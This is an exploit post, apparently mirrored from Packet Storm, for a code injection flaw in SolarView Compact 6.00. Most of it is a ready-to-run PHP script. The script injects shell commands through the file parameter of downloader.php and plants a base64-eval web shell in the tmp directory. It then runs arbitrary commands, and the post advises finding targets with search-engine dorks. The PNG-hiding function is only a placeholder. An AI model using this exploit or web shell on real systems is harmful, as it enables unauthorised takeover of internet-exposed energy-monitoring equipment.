Share
## https://sploitus.com/exploit?id=PACKETSTORM:182156
=============================================================================================================================================  
| # Title : SolarView Compact 6.00 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.contec.com/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 112 set your target .  
  
[+] save code as poc.php .  
  
[+] USage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
<?php  
  
class SolarViewExploit {  
private $targetUri;  
private $webshellName;  
private $postParam;  
private $timeout;  
  
public function __construct($targetUri, $timeout = 40) {  
$this->targetUri = rtrim($targetUri, '/');  
$this->timeout = $timeout;  
}  
  
public function uploadWebshell($webshell = null) {  
// Randomize file name if option WEBSHELL is not set  
$this->webshellName = $webshell ?? $this->generateRandomFileName();  
  
$this->postParam = $this->generateRandomString(8);  
  
// Inject PHP payload into the PLTE chunk of a PNG image to hide the payload  
$phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";  
$pngWebshell = $this->injectPhpPayloadPng($phpPayload);  
  
if ($pngWebshell === null) {  
return null;  
}  
  
// Encode webshell data and write to file on the target at the tmp directory for execution  
$payload = base64_encode($pngWebshell);  
$cmd = "echo {$payload}|base64 -d >tmp/{$this->webshellName}";  
return $this->executeCommand($cmd);  
}  
  
public function executePhp($cmd) {  
$payload = base64_encode($cmd);  
return $this->sendRequest('POST', "/tmp/{$this->webshellName}", [  
$this->postParam => $payload  
]);  
}  
  
public function executeCommand($cmd) {  
// Encode payload with base64 to ensure proper execution  
$payload = base64_encode($cmd);  
$cmd = "echo {$payload}|base64 -d|bash";  
return $this->sendRequest('GET', '/downloader.php', [  
'file' => ";{$cmd};.zip"  
]);  
}  
  
public function check() {  
// Checking if the target is vulnerable by echoing a randomised marker  
echo "Checking if {$this->targetUri} can be exploited.\n";  
$marker = $this->generateRandomString(16);  
$res = $this->executeCommand("echo {$marker};cat /opt/svc/version");  
  
if ($res && $res['code'] == 200 && strpos($res['body'], $marker) !== false) {  
if (preg_match('/SolarView Compact ver\.\d\.\d\d/', $res['body'], $matches)) {  
return "Vulnerable: " . $matches[0];  
}  
}  
return 'Safe: No valid response received from the target.';  
}  
  
public function exploit($payload) {  
echo "Executing payload on {$this->targetUri}.\n";  
$res = $this->uploadWebshell();  
  
if (!$res || $res['code'] !== 200) {  
throw new Exception('Web shell upload error.');  
}  
  
$this->executePhp($payload);  
}  
  
private function sendRequest($method, $uri, $params) {  
$url = $this->targetUri . $uri;  
$options = [  
'http' => [  
'method' => $method,  
'header' => 'Content-Type: application/x-www-form-urlencoded',  
'timeout' => $this->timeout,  
'content' => http_build_query($params)  
]  
];  
  
$context = stream_context_create($options);  
$response = @file_get_contents($url, false, $context);  
$code = isset($http_response_header[0]) ? intval(substr($http_response_header[0], 9, 3)) : 0;  
  
return [  
'code' => $code,  
'body' => $response  
];  
}  
  
private function injectPhpPayloadPng($phpPayload) {  
// Here you would implement the logic to inject the PHP payload into a PNG file.  
// This is a placeholder implementation.  
return $phpPayload; // Modify this to return the actual PNG with embedded PHP payload.  
}  
  
private function generateRandomFileName($length = 16) {  
return bin2hex(random_bytes($length / 2)) . '.php';  
}  
  
private function generateRandomString($length) {  
return bin2hex(random_bytes($length / 2));  
}  
}  
  
// Example of usage  
$targetUri = 'http://target-ip'; // Replace with the actual target URL  
$exploit = new SolarViewExploit($targetUri);  
echo $exploit->check();  
$exploit->exploit('whoami'); // Replace with your payload  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================